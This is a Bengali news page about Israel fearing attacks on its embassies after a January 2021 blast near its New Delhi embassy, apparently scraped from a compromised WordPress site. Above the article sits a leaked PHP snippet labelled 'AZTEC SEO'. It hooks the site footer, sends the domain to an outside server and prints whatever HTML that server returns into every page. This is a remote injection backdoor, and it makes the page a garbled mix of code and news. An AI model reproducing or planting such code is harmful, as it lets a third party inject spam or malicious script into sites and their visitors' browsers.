/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); নয়া দিল্লিতে বিস্ফোরণের পর বিশ্বের সব দূতাবাসেই হামলার আশঙ্কা করছে ইসরাইল | Dhaka Sky News

ব্রিটিশ প্রজাতির করোনাভাইরাসের বিরুদ্ধেও ইরানি ভ্যাকসিন কার্যকর

আগের সংবাদ

আমিরাতের ঝামেলাপূর্ণ ভূমিকা মানবিক সংকট ও অস্থিতিশীলতা সৃষ্টি করেছে: মার্কিন গবেষণা প্রতিষ্ঠান

পরের সংবাদ

নয়া দিল্লিতে বিস্ফোরণের পর বিশ্বের সব দূতাবাসেই হামলার আশঙ্কা করছে ইসরাইল

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: January 31, 2021 , 9:49 pm

ইসরাইলের চ্যানেল-টুয়েলভ জানিয়েছে, ইসরাইল আশঙ্কা করছে বিশ্বের বিভিন্ন দেশে দূতাবাসগুলোতে হামলা হতে পারে। নয়া দিল্লিতে অবস্থিত ইসরাইলি দূতাবাসের কাছে বিস্ফোরণের পর থেকেই এ আশঙ্কা বেড়েছে।

ভারতের এনডিটিভি খবর দিয়েছে, শুক্রবার নয়া দিল্লিতে ইসরাইলি দূতাবাসের কাছে বিস্ফোরণ ঘটেছে। তদন্তকারীরা জানিয়েছেন, বিস্ফোরণের পর ইসরাইলি রাষ্ট্রদূতের উদ্দেশে পাঠানো একটি বার্তাও তারা পেয়েছেন।

নয়া দিল্লিতে দূতাবাসের কাছে ঐ বিস্ফোরণে কেউ হতাহত হয়নি, তবে তিনটি গাড়ি ক্ষতিগ্রস্ত হয়েছে।

ভারত সরকার এ বিষয়ে পূর্ণ তদন্তের আশ্বাস দিয়েছে।

দিল্লির মুখ্যমন্ত্রী অরবিন্দ কেজরিওয়াল ওই ঘটনায় উদ্বেগ প্রকাশ করেছেন। দিল্লির শান্তি নষ্ট করার যেকোনো প্রয়াস কঠোরভাবে মোকাবিলা করা হবে বলে তিনি জানিয়েছেন। সূত্র : পার্সটুডে